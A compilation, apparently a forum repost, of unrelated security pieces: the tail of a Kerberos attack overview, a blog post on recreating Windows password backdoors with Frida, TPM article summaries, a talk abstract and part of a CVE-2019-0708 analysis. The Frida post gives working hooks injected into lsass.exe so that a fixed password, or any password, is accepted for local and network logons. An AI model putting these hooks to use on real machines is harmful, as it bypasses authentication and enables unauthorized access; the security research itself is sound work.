An alternative is getting the ticket from the lsass process memory, where the session key also resides. This procedure can be performed with Mimikatz.

It is better to obtain a TGT, since a TGS can only be used against one service. Also, it should be taken into account that the lifetime of tickets is 10 hours by default; after that they are unusable.

Golden Ticket and Silver Ticket

The objective of the Golden Ticket is to build a TGT. For this, it is necessary to obtain the NTLM hash of the krbtgt account. Once that is obtained, a TGT with a custom user and privileges can be built.

Moreover, even if the user changes their password, the ticket will still be valid. The TGT can only be invalidated if it expires or the krbtgt account changes its password.

The Silver Ticket is similar; however, the ticket built this time is a TGS. In this case the service key is required, which is derived from the service owner account. Nevertheless, it is not possible to sign the PAC correctly without the krbtgt key. Therefore, if the service verifies the PAC, this technique will not work.

Kerberoasting

Kerberoasting is a technique that takes advantage of TGSs to crack user account passwords offline.

As seen above, a TGS comes encrypted with the service key, which is derived from the NTLM hash of the service owner account. Usually the owners of services are the computers on which the services run. However, computer passwords are very complex, so trying to crack them is not useful. The same applies to the krbtgt account, so a TGT is not crackable either.

All the same, on some occasions the owner of a service is a normal user account. In these cases it is more feasible to crack the password. Moreover, this sort of account normally has very juicy privileges. Additionally, only a normal domain account is needed to get a TGS for any service, because Kerberos does not perform authorization checks.

ASREPRoast

ASREPRoast is similar to Kerberoasting in that it also aims to crack account passwords.

If the DONT_REQ_PREAUTH attribute is set on a user account, it is possible to build a KRB_AS_REQ message for that account without knowing its password.

After that, the KDC will respond with a KRB_AS_REP message, which will contain some information encrypted with the user key. Thus, this message can be used to crack the user password.
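As a rough illustration of how such accounts can be spotted, the sketch below checks the relevant bit in an account's userAccountControl value. The flag values are the ones Microsoft documents for userAccountControl; the account names and the helper is_asreproastable are hypothetical and only serve the example.

```python
# userAccountControl bit values as documented by Microsoft.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000  # the DONT_REQ_PREAUTH attribute


def is_asreproastable(user_account_control: int) -> bool:
    """Return True when the account is enabled and skips pre-authentication."""
    enabled = not (user_account_control & UF_ACCOUNTDISABLE)
    no_preauth = bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)
    return enabled and no_preauth


# Hypothetical sample data, not taken from a real directory.
accounts = {
    "alice": UF_NORMAL_ACCOUNT,
    "svc_legacy": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH,
    "old_admin": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE,
}

candidates = sorted(name for name, uac in accounts.items() if is_asreproastable(uac))
print(candidates)
```

Only the enabled account with the flag set is reported; disabled accounts are skipped on the assumption that they cannot authenticate anyway.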

Conclusion

In this first post the Kerberos authentication process has been studied and the attacks have been introduced. The following posts will show how to perform these attacks in practice and how delegation works. I really hope that this post helps in understanding some of the more abstract concepts of Kerberos.

References

- Kerberos v5 RFC: https://tools.ietf.org/html/rfc4120

- [MS-KILE] – Kerberos extension: https://msdn.microsoft.com/en-us/library/cc233855.aspx

- [MS-APDS] – Authentication Protocol Domain Support: https://msdn.microsoft.com/en-us/library/cc223948.aspx

- Mimikatz and Active Directory Kerberos Attacks: https://adsecurity.org/?p=556

- Explain like I’m 5: Kerberos: https://www.roguelynn.com/words/explain-like-im-5-kerberos/

- Kerberos & KRBTGT: https://adsecurity.org/?p=483

- Mastering Windows Network Forensics and Investigation, 2nd Edition. Authors: S. Anson, S. Bunting, R. Johnson and S. Pearson. Publisher: Sybex.

- Active Directory, 5th Edition. Authors: B. Desmond, J. Richards, R. Allen and A.G. Lowe-Norris

- Service Principal Names: https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx

- Active Directory functional levels: https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0

- OverPass The Hash – Gentilkiwi Blog: https://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash

- Pass The Ticket – Gentilkiwi Blog: https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos

- Golden Ticket – Gentilkiwi Blog: https://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos

- Mimikatz Golden Ticket Walkthrough: https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html

- Attacking Kerberos: Kicking the Guard Dog of Hades: https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf

- Kerberoasting – Part 1: https://room362.com/post/2016/kerberoast-pt1/

- Kerberoasting – Part 2: https://room362.com/post/2016/kerberoast-pt2/

- Roasting AS-REPs: https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

- PAC Validation: https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html

- Understanding PAC Validation: https://blogs.msdn.microsoft.com/openspecification/2009/04/24/understanding-microsoft-kerberos-pac-validation/

- Reset the krbtgt account password/keys: https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51

- Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: https://www.microsoft.com/en-us/download/details.aspx?id=36036

- Fun with LDAP, Kerberos (and MSRPC) in AD Environments: https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58

-

tl;dr

I have been actively using Frida for a little over a year now, but primarily on mobile devices while building the objection toolkit. My interest in using it on other platforms has been growing, and I decided to play with it on Windows to get a feel. I needed an objective, and decided to try to port a well-known local Windows password backdoor to Frida. This post is mostly about the process of how Frida will let you quickly investigate and prototype using dynamic instrumentation.

the setup

Before I could do anything, I had to install and configure Frida. I used the standard Python-based Frida environment as this includes tooling for really easy, rapid development. I just had to install a Python distribution on Windows, followed by a pip install frida frida-tools.





With Frida configured, the next question was what to target? Given that anything password-related is usually interesting, I decided on the Windows Local Security Authority Subsystem Service (lsass.exe). I knew there was a lot of existing knowledge that could be referenced for lsass, especially when considering projects such as Mimikatz, but decided to venture down the path of discovery alone. I figured I’d start by attaching Frida to lsass.exe and enumerate the process a little. Currently loaded modules and any module exports were of interest to me. I started by simply typing frida lsass.exe to attach to the process from an elevated command prompt (Runas Administrator -> accept UAC prompt), and failed pretty hard:

-

RtlCreateUserThread returned 0xc0000022



Running Frida from a PowerShell prompt worked fine though:

-

Frida attached to lsass.exe



Turns out, SeDebugPrivilege was not granted by default for the command prompt in my Windows 10 installation, but was when invoking PowerShell.

-

SeDebugPrivilege disabled in an Administrator command prompt



With that out of the way, let's write some scripts to enumerate lsass! I started simple, with only a Process.enumerateModules() call, iterating the results and printing the module name. This would tell me which modules were currently loaded in lsass.
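For readers who prefer driving Frida from Python rather than the frida REPL, module enumeration could look roughly like the sketch below. It is not the script used in the post: the agent source, the modules list and the function names are assumptions for illustration, and it relies on the frida Python bindings (frida.attach, create_script, script.on, script.load) being installed and run from a suitably privileged prompt.

```python
import time

# JavaScript agent that runs inside the target; send() posts each module
# name back to the Python host.
ENUM_MODULES_JS = """
Process.enumerateModules().forEach(function (m) {
    send(m.name);
});
"""

modules = []  # module names collected from the agent


def on_message(message, data):
    # Frida delivers send() payloads as {'type': 'send', 'payload': ...}.
    if message.get("type") == "send":
        modules.append(message["payload"])
    else:
        print(message)  # errors raised inside the agent end up here


def enumerate_modules(target="lsass.exe"):
    import frida  # imported lazily so this file loads without Frida installed

    session = frida.attach(target)
    script = session.create_script(ENUM_MODULES_JS)
    script.on("message", on_message)
    script.load()
    time.sleep(1)  # give queued messages a moment to arrive
    session.detach()
    return modules
```

Calling enumerate_modules() and printing the returned list should give the same kind of output as the interactive session, assuming the attach succeeds.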

-

lsass module enumeration



Some Googling of the loaded DLLs, as well as exports enumeration, had me focus on the msv1_0.DLL Authentication Package first. This authentication package was described as the one responsible for local machine logons, and a prime candidate for our shenanigans. Frida has a utility called frida-trace (part of the frida-tools package) which could be used to “trace” function calls within a DLL. So, I went ahead and traced the msv1_0.dll DLL while performing a local interactive login using runas.

-

msv1_0.dll exports, viewed in IDA Free

-

frida-trace output for the msv1_0.dll when performing two local, interactive authentication actions



As you can see, frida-trace makes it suuuuuper simple to get a quick idea of what may be happening under the hood, showing a flow of LsaApCallPackageUntrusted() -> MsvSamValidate(), followed by two LsaApLogonTerminated() calls when I invoke runas /user:user cmd. Without studying the function prototype for MsvSamValidate(), I decided to take a look at what the return values would be for the function (if any) with a simple log(retval) statement in the onLeave() function. This function was part of the autogenerated handlers that frida-trace creates for any matched methods it should trace, dumping a small JavaScript snippet in the __handlers__ directory.

-

MsvValidate return values

A naive assumption at this stage was that if the supplied credentials were incorrect, MsvSamValidate() would simply return a non-NULL value (which may be an error code or something). The hook does not consider what the method is actually doing (or that there may be further function calls that may be more interesting), especially in the case of valid authentication, but I figured I would give overriding the return value a shot, even if an invalid set of credentials were supplied. Editing the handler generated by frida-trace, I added a retval.replace(0x0) statement to the onLeave() method, and tried to auth…

-

One dead Windows Computer

Turns out, LSASS is not that forgiving when you tamper with its internals

I had no expectation that this was going to work, but it proved an interesting exercise nonetheless. From here, I had to resort to actually understanding MsvSamValidate() before I could get anything useful done with it.

backdoor – approach #1







Playing with MsvSamValidate() did not yield much in terms of an interesting hook, but researching LSASS and Authentication Packages online led me to this article which described a “universal” password backdoor for any local Windows account. I figured this may be an interesting one to look at, and so a new script began that focussed on RtlCompareMemory. According to the article, RtlCompareMemory would be called to finally compare the MD4 value from a local SAM database with a calculated MD4 of a provided password. The blog post also included some sample code to demonstrate the backdoor, which implements a hardcoded password to trigger a successful authentication scenario. From the MSDN docs, RtlCompareMemory takes three arguments where the first two are pointers. The third argument is a count for the number of bytes to compare. The function would simply return a value indicating how many bytes from the two blocks of memory were the same. In the case of an MD4 comparison, if 16 bytes were the same, then the two blocks will be considered the same, and the RtlCompareMemory function will return 0x10.
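To make the return-value semantics concrete, here is a small Python model of the comparison. It is only a sketch: rtl_compare_memory is a hypothetical stand-in for the real function, and it assumes the count stops at the first mismatching byte.

```python
def rtl_compare_memory(source1: bytes, source2: bytes, length: int) -> int:
    """Model of RtlCompareMemory: count matching bytes up to the first mismatch."""
    matched = 0
    for i in range(length):
        if source1[i] != source2[i]:
            break
        matched += 1
    return matched


# A 16-byte MD4 value (the hash of the test password used in this post).
stored = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")

same = rtl_compare_memory(stored, stored, 16)
different = rtl_compare_memory(stored, bytes(16), 16)
print(hex(same), hex(different))
```

A full 16-byte match yields 0x10, which is the value the backdoor later forces; any earlier mismatch yields a smaller number.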



To understand how RtlCompareMemory was used from an LSASS perspective, I decided to use frida-trace to visualise invocations of the function. This was a really cheap attempt considering that I knew this specific function was interesting. I did not have to find out which DLLs may have this function or anything, frida-trace does all of that for us after simply specifying the target function name.

-

Unfiltered RtlCompareMemory invocations from within lsass.exe

The RtlCompareMemory function was resolved in both Kernel32.dll as well as in ntdll.dll. I focused on ntdll.dll, but it turns out it could work with either. Upon invocation, without even attempting to authenticate to anything, the output was racing past in the terminal making it impossible to follow (as you can see by the “ms” readings in the above screenshot). I needed to get the output filtered, showing only the relevant invocations. The first question I had was: “Are these calls from kernel32 or ntdll?”, so I added a module string to the autogenerated frida-trace handler to distinguish the two.

-

Module information added to log() calls

Running the modified handlers, I noticed that the RtlCompareMemory function in both modules was being called, every time. Interesting. Next, I decided to log the lengths that were being compared. Maybe there is a difference? Remember, RtlCompareMemory receives a third argument for the length, so we could just dump that value from memory.

-

RtlCompareMemory size argument dumping

So even the size was the same for the RtlCompareMemory calls in both of the identified modules. At this stage, I decided to focus on the function in ntdll.dll, and ignore the kernel32.dll module for now. I also dumped the bytes being compared to the screen so that I could get some indication of the data involved. Frida has a hexdump helper specifically for this!

-

RtlCompareMemory block contents





I observed the output for a while to see if I could spot any patterns, especially while performing authentication. The password for the user account I configured was… password, and eventually, I spotted it as one of the blocks RtlCompareMemory had to compare.

-

ASCII, NULL padded password spotted as one of the memory blocks used in RtlCompareMemory





I also noticed that many different block sizes were being compared using RtlCompareMemory. As the local Windows SAM database stores the password for an account as an MD4 hash, these hashes could be represented as 16 bytes in memory. As RtlCompareMemory gets the length of bytes to compare, I decided to just filter the output to only report where 16 bytes were to be compared. This is also how the code in the previously mentioned blogpost filters candidates to check for the backdoor password. This time round, the output generated by frida-trace was much more readable and I could get a better idea of what was going on. An analysis of the output yielded the following results:

- When providing either the correct or an incorrect password to the runas command, the RtlCompareMemory function is called five times.

- The first eight characters from the password entered will appear to be padded with a 0x00 byte between each character, most likely due to unicode encoding, making up a 16 byte stream that gets compared with something else (unknown value).

- The fourth call to RtlCompareMemory appears to compare to the hash from the SAM database which is provided as arg[0]. The password for the test account was password, which has an MD4 hash value of 8846f7eaee8fb117ad06bdd830b7586c.
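The second observation can be reproduced without touching LSASS. Assuming the padding really is UTF-16LE encoding (the post only says "most likely"), the first eight characters of a password occupy exactly 16 bytes; first_16_bytes below is a hypothetical helper for the illustration.

```python
def first_16_bytes(password: str) -> bytes:
    """Encode as UTF-16LE and keep the first 16 bytes (eight ASCII characters)."""
    return password.encode("utf-16le")[:16]


for candidate in ("password", "testing123"):
    block = first_16_bytes(candidate)
    # Each ASCII character is followed by a 0x00 byte.
    print(candidate, len(block), block.hex())
```

For the invalid password testing123 from the screenshots, only "testing1" fits into the 16-byte block, which matches the truncation described above.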

-

Five calls to RtlCompareMemory (incl. memory block contents) that wanted to compare 16 bytes when providing an invalid password of testing123

-

Five calls to RtlCompareMemory (incl. memory block contents) that wanted to compare 16 bytes when providing a valid password of password

At this point I figured I should log the function return values as well, just to get an idea of what a success and failure condition looks like. I made two more authentication attempts using runas, one with a valid password and one with an invalid password, observing what the RtlCompareMemory function returns.

-

RtlCompareMemory return values

The fourth call to RtlCompareMemory returns the number of bytes that matched in the successful case (which was actually the MD4 comparison), which should be 16 (indicated by the hex 0x10). Considering what we have learnt so far, I naively assumed I could make a “universal backdoor” by simply returning 0x10 for any call to RtlCompareMemory that wanted to compare 16 bytes, originating from within LSASS. This would mean that any password would work, right? I updated the frida-trace handler to simply retval.replace(0x10) indicating that 16 bytes matched in the onLeave method and tested!

-

Authentication failure after aggressively overriding the return value for RtlCompareMemory



Instead of successfully authenticating, the number of times RtlCompareMemory got called was reduced to only two invocations (usually it would be five), and the authentication attempt completely failed, even when the correct password was provided. I wasn’t as lucky as I had hoped for. I figured this may be because of the overrides, and I may be breaking other internals where a return for RtlCompareMemory may be used in a negative test.

For plan B, I decided to simply recreate the backdoor of the original blogpost. That means only returning that check as successful (in other words, returning 0x10 from the RtlCompareMemory function) when authenticating with a specific password. We learnt in previous tests that the fourth invocation of RtlCompareMemory compares the two buffers of the calculated MD4 of the supplied password and the MD4 from the local SAM database. So, for the backdoor to trigger, we should embed the MD4 of a password we know, and trigger when that is supplied. I used a small python2 one-liner to generate an MD4 of the word backdoor formatted as an array you can use in JavaScript:

    import hashlib;print([ord(x) for x in hashlib.new('md4', 'backdoor'.encode('utf-16le')).digest()])

When run in a python2 interpreter, the one-liner should output something like [22, 115, 28, 159, 35, 140, 92, 43, 79, 18, 148, 179, 250, 135, 82, 84]. This is a byte array that could be used in a Frida script to compare if the supplied password was backdoor, and if so, return 0x10 from the RtlCompareMemory function. This should also prevent the case where blindly returning 0x10 for any 16 byte comparison using RtlCompareMemory breaks other stuff.
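On current Python 3 installations, hashlib.new('md4') may be unavailable because newer OpenSSL builds treat MD4 as a legacy algorithm. As a fallback, the sketch below computes the same value with a small pure-Python MD4 written from RFC 1320; md4 and nt_hash are hypothetical helper names, and the code is meant for illustration rather than performance.

```python
import struct


def _rol(value: int, bits: int) -> int:
    """Rotate a 32-bit value left."""
    return ((value << bits) | (value >> (32 - bits))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 following RFC 1320."""
    # Pad with 0x80, zeros up to 56 mod 64, then the bit length (little endian).
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    rounds = (
        # (boolean function, additive constant, shifts, message word order)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
         (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for offset in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[offset:offset + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _rol((a + func(b, c, d) + x[k] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate the register roles
        a, b, c, d = [(v + w) & 0xFFFFFFFF for v, w in zip((a, b, c, d), (aa, bb, cc, dd))]
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16le"))


print(nt_hash("password").hex())
print(list(nt_hash("backdoor")))  # array form, ready to paste into JavaScript
```

The first line printed can be checked against the MD4 value for password quoted earlier in the post; the second is the array form for the backdoor password.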

Up until now we have been using frida-trace and its autogenerated handlers to interact with the RtlCompareMemory function. While this was perfect for us to quickly interact with the target function, a more robust way is preferable in the long term. Ideally, we want to make the sharing of a simple JavaScript snippet easy. To replicate the functionality we have been using up until now, we can use the Frida Interceptor API, providing the address of ntdll!RtlCompareMemory and performing our logic in there as we have in the past using the autogenerated handler. We can find the address of our function using the Module API, calling getExportByName on it.

    // from: https://github.com/sensepost/frida-windows-playground/blob/master/RtlCompareMemory_backdoor.js
    const RtlCompareMemory = Module.getExportByName('ntdll.dll', 'RtlCompareMemory');

    // generate bytearrays with python:
    // import hashlib;print([ord(x) for x in hashlib.new('md4', 'backdoor'.encode('utf-16le')).digest()])
    //const newPassword = new Uint8Array([136, 70, 247, 234, 238, 143, 177, 23, 173, 6, 189, 216, 48, 183, 88, 108]); // password
    const newPassword = new Uint8Array([22, 115, 28, 159, 35, 140, 92, 43, 79, 18, 148, 179, 250, 135, 82, 84]); // backdoor

    Interceptor.attach(RtlCompareMemory, {
      onEnter: function (args) {
        this.compare = 0;
        if (args[2] == 0x10) {
          const attempt = new Uint8Array(ptr(args[1]).readByteArray(16));
          this.compare = 1;
          this.original = attempt;
        }
      },
      onLeave: function (retval) {
        if (this.compare == 1) {
          var match = true;
          for (var i = 0; i != this.original.byteLength; i++) {
            if (this.original[i] != newPassword[i]) {
              match = false;
            }
          }
          if (match) {
            retval.replace(16);
          }
        }
      }
    });

The resultant script means that one can authenticate using any local account with the password backdoor when invoking Frida with frida lsass.exe -l .\backdoor.js from an Administrative PowerShell prompt.
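The decision the hook makes can be modelled outside of Frida. The following Python sketch is not the Frida script itself: rtl_compare_memory and hooked_compare are hypothetical names, and the stand-in for the original function assumes it counts matching bytes up to the first mismatch. The backdoor bytes are the array quoted in the post.

```python
# MD4 byte array for the backdoor password, copied from the post.
BACKDOOR_MD4 = bytes([22, 115, 28, 159, 35, 140, 92, 43,
                      79, 18, 148, 179, 250, 135, 82, 84])


def rtl_compare_memory(source1: bytes, source2: bytes, length: int) -> int:
    """Stand-in for the original function: matching bytes up to the first mismatch."""
    matched = 0
    for i in range(length):
        if source1[i] != source2[i]:
            break
        matched += 1
    return matched


def hooked_compare(source1: bytes, source2: bytes, length: int) -> int:
    """Mirror of the hook: only 16-byte comparisons of the backdoor hash are overridden."""
    result = rtl_compare_memory(source1, source2, length)  # the original call
    if length == 0x10 and source2[:16] == BACKDOOR_MD4:    # onEnter filter + onLeave check
        return 0x10                                        # retval.replace(16)
    return result


sam_hash = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")  # MD4 of the test password
print(hooked_compare(sam_hash, BACKDOOR_MD4, 16))  # backdoor password supplied
print(hooked_compare(sam_hash, bytes(16), 16))     # some other wrong password
```

Because every other comparison passes through unchanged, this variant avoids the breakage seen when 0x10 was returned for all 16-byte comparisons.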

backdoor – approach #2



Our backdoor approach has a few limitations; the first being that network logons (such as ones initiated using smbclient) don’t appear to work with the backdoor password, the second being that I wanted any password to work, not just backdoor (or whatever you embed in the script). Using the script we have already written, I decided to take a closer look and try and figure out what was calling RtlCompareMemory.

I love backtraces, and generating those with Frida is really simple using the backtrace() method on the Thread module. With a backtrace we should be able to see exactly where a call to RtlCompareMemory came from and extend our investigation a little further.
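As a sketch of what such a hook could look like, the Python snippet below generates a small Frida agent that prints a symbolicated backtrace on every call. The template and the backtrace_agent helper are assumptions for illustration, not the code used in the post; the agent relies on Thread.backtrace, Backtracer.ACCURATE and DebugSymbol.fromAddress from Frida's JavaScript API.

```python
# JavaScript agent template; %(module)s and %(export)s are filled in by Python.
BACKTRACE_JS_TEMPLATE = """
const target = Module.getExportByName('%(module)s', '%(export)s');
Interceptor.attach(target, {
    onEnter: function (args) {
        const frames = Thread.backtrace(this.context, Backtracer.ACCURATE)
            .map(DebugSymbol.fromAddress);
        console.log('%(export)s called from:\\n' + frames.join('\\n') + '\\n');
    }
});
"""


def backtrace_agent(module: str, export: str) -> str:
    """Return agent source that logs a backtrace for each call to module!export."""
    return BACKTRACE_JS_TEMPLATE % {"module": module, "export": export}


source = backtrace_agent("ntdll.dll", "RtlCompareMemory")
print(source)
```

The printed source can be saved to a file and loaded with the -l option of the frida command, in the same way as the other scripts in this post.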

-

Backtraces printed for each invocation of RtlCompareMemory







I investigated the five backtraces and found two function names that were immediately interesting. The first being MsvpValidateTarget and the second being MsvpPasswordValidate. MsvpValidateTarget was being called right after MsvpSamValidate, which may explain why my initial hooking attempts failed as there may be more processing happening there. MsvpPasswordValidate was being called in the fourth invocation of RtlCompareMemory which was the call that compared two MD4 hashes when authenticating interactively as previously discussed. At this stage I Google’d the MsvpPasswordValidate function, only to find out that this method is well known for password backdoors! In fact, it’s the same method used by Inception for authentication bypasses. Awesome, I may be on the right track after all. I couldn’t quickly find a function prototype for MsvpPasswordValidate online, but a quick look in IDA Free hinted towards the fact that MsvpPasswordValidate may expect seven arguments. I figured now would be a good time to hook those, and log the return value.

-

MsvpPasswordValidate argument and return value dump

Using runas /user:user cmd from a command prompt and providing the correct password for the account, MsvpPasswordValidate would return 0x1, whereas providing an incorrect password would return 0x0. Seems easy enough? I modified the existing hook to simply change the return value of MsvpPasswordValidate to always be 0x1. Doing this, I was able to authenticate using any password for any valid user account, even when using network authentication!

-

Successful authentication, with any password for a valid user account

    // from: https://github.com/sensepost/frida-windows-playground/blob/master/MsvpPasswordValidate_backdoor.js
    const MsvpPasswordValidate = Module.getExportByName(null, 'MsvpPasswordValidate');
    console.log('MsvpPasswordValidate @ ' + MsvpPasswordValidate);

    Interceptor.attach(MsvpPasswordValidate, {
      onLeave: function (retval) {
        retval.replace(0x1);
      }
    });

creating standalone Frida executables



The hooks we have built so far depend heavily on the Frida python modules. This is not something you would necessarily have available on an arbitrary Windows target, making the practicality of using this rather complicated. We could use something like py2exe, but that comes with its own set of bloat and things to avoid. Instead, we could build a standalone executable that bypasses the need for a python runtime entirely, in C.

The main Frida source repository contains some example code for those that want to make use of the lower level bindings here. When choosing to go down this path, you will need to decide between two types of C bindings; the one that includes the V8 JavaScript engine (frida-core/frida-gumjs), and one that does not (frida-gum). When using frida-gum, instrumentation needs to be implemented using a C API, skipping the JavaScript engine layer entirely. This has obvious wins when it comes to overall binary size, but increases the implementation complexity a little bit. Using frida-core, we could simply reuse the JavaScript hook we have already written, embedding it in an executable. But, we will be packaging the V8 engine with our executable, which is not great from a size perspective.

A complete example of using frida-core is available here, and that is what I used as a template. The only thing I changed was how a target process ID was determined. The original code accepted a process ID as an argument, but I changed that to determine it using frida_device_get_process_by_name_sync, providing lsass.exe as the name of the process I was interested in. The definition for this function lives in frida-core.h, which you can get as part of the frida-core devkit download. Next, I embedded the MsvpPasswordValidate bypass hook and compiled the project using Visual Studio Community 2017. The result? A beefy 44MB executable that would now work regardless of the status of a Python installation. Maybe py2exe wasn’t such a bad idea after all…

-

Passback binary, in all of its 44mb glory, injected into LSASS.exe to allow for local authentication using any password

Some work could be done to optimise the overall size of the resultant executable, but this would involve rebuilding the frida-core devkit from source and stripping the pieces we won’t need. An exercise left for the reader, or for me, for another day. If you are interested in building this yourself, have a look at the source code repository for passback here, opening it in Visual Studio 2017 and hitting “build”.

summary

If you got here, you saw how it was possible to recreate two well-known password backdoors on Windows based computers using Frida. The real world merits of where this may be useful may be small, but I believe the journey getting there is what was important. A Github repository with all of the code samples used in this post is available here.

Sursa: https://sensepost.com/blog/2019/recreating-known-universal-windows-password-backdoors-with-frida/

-

-

Windows Insight: The TPM

The Windows Insight repository currently hosts three articles on the TPM (Trusted Platform Module):

- The TPM: Communication Interfaces (Aleksandar Milenkoski): In this work, we discuss how the different components of the Windows 10 operating system deployed in user-land and in kernel-land, use the TPM. We focus on the communication interfaces between Windows 10 and the TPM. In addition, we discuss the construction of TPM usage profiles, that is, information on system entities communicating with the TPM as well as on communication patterns and frequencies;

- The TPM: Integrity Measurement (Aleksandar Milenkoski): In this work, we discuss the integrity measurement mechanism of Windows 10 and the role that the TPM plays as part of it. This mechanism, among other things, implements the production of measurement data. This involves calculation of hashes of relevant executable files or of code sequences at every system startup. It also involves the storage of these hashes and relevant related data in log files for later analysis;

- The TPM: Workflow of the Manual and Automatic TPM Provisioning Processes (Aleksandar Milenkoski): In this work, we describe the implementation of the TPM provisioning process in Windows 10. We first define the term TPM provisioning in order to set the scope of this work. Under TPM provisioning, we understand activities storing data in the TPM device, where the stored data is a requirement for the device to be used. This includes: authorization values, the Endorsement Key (EK), and the Storage Root Key (SRK).

– Aleksandar Milenkoski

Sursa: https://insinuator.net/2019/05/windows-insight-the-tpm/

-

In this talk we will explore how file formats can be abused to target the security of an end user or server, without harming a CPU register or the memory layout, with a focus on the OpenDocument file format. First, a short introduction to file format bug hunting will be given, based on my own approach. This will cover my latest Adobe PDF reader finding and will lead up to my discovery of a remote code execution in LibreOffice. It shows how a simple path traversal issue allowed me to abuse the macro feature to execute a Python script installed by LibreOffice and abuse it to execute any local program with parameters without any prompt. Additionally, other scripting languages supported in LibreOffice, other interesting features, and differences from OpenOffice will be explored. As software like ImageMagick uses LibreOffice for file conversion, potential security issues on the server side will be explained as well. This focuses on certain problems and limitations an attacker has to work with regarding macro support, and on other threats like polyglot files or local file path information. Lastly, the potential threats will be summed up to raise awareness regarding any support for file formats and what precautions should be taken.

About Alex Inführ

As a Senior Penetration Tester with Cure53, Alex is an expert on browser security and PDF security. His cardinal skillset relates to spotting and abusing ways for uncommon script execution in MSIE, Firefox and Chrome. Alex’s additional research foci revolve around SVG security and Adobe products used in the web context. He has worked with Cure53 for multiple years with a focus on web security, JavaScript sandboxes and file format issues. He presented his research at conferences like Appsec Amsterdam, Appsec Belfast, ItSecX and multiple OWASP chapters. As part of his research as a co-author for the 'Cure53 Browser Security White Paper', sponsored by Google, he investigated the security of browser extensions.

About Security Fest 2019

May 23rd - 24th 2019

This summer, Gothenburg will become the most secure city in Sweden! We'll have two days filled with great talks by internationally renowned speakers on some of the most cutting edge and interesting topics in IT-security! Our attendees will learn from the best and the brightest, and have a chance to get to know each other during the lunch, dinner, after-party and scheduled breaks. Please note that you have to be at least 18 years old to attend.

Highlights of Security Fest

- Interesting IT-security talks by renowned speakers

- Lunch and dinner included

- Great CTF with nice prizes

- Awesome party!

Venue

Security Fest is held in Eriksbergshallen in Gothenburg, with an industrial decor from the time it was used as a mechanical workshop. Right next to the venue, you can stay at Quality Hotel 11.

-

-

Windows Privilege Escalation 0day (not fixed)

-

-

-

RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708

By Eoin Carroll, Alexandre Mundo, Philippe Laulheret, Christiaan Beek and Steve Povolny on May 21, 2019

During Microsoft’s May Patch Tuesday cycle, a security advisory was released for a vulnerability in the Remote Desktop Protocol (RDP). What was unique in this particular patch cycle was that Microsoft produced a fix for Windows XP and several other operating systems, which have not been supported for security updates in years. So why the urgency and what made Microsoft decide that this was a high risk and critical patch?

According to the advisory, the issue discovered was serious enough that it led to Remote Code Execution and was wormable, meaning it could spread automatically on unprotected systems. The bulletin referenced the well-known network worm “WannaCry”, which was heavily exploited just a couple of months after Microsoft released MS17-010 as a patch for the related vulnerability in March 2017. McAfee Advanced Threat Research has been analyzing this latest bug to help prevent a similar scenario and we are urging those with unpatched and affected systems to apply the patch for CVE-2019-0708 as soon as possible. It is extremely likely malicious actors have weaponized this bug and exploitation attempts will likely be observed in the wild in the very near future.

Vulnerable Operating Systems:

- Windows 2003

- Windows XP

- Windows 7

- Windows Server 2008

- Windows Server 2008 R2

Worms are viruses which primarily replicate on networks. A worm will typically execute itself automatically on a remote machine without any extra help from a user. If a virus’ primary attack vector is via the network, then it should be classified as a worm.

The Remote Desktop Protocol (RDP) enables connection between a client and endpoint, defining the data communicated between them in virtual channels. Virtual channels are bidirectional data pipes which enable the extension of RDP. Windows Server 2000 defined 32 Static Virtual Channels (SVCs) with RDP 5.1, but due to limitations on the number of channels further defined Dynamic Virtual Channels (DVCs), which are contained within a dedicated SVC. SVCs are created at the start of a session and remain until session termination, unlike DVCs which are created and torn down on demand.

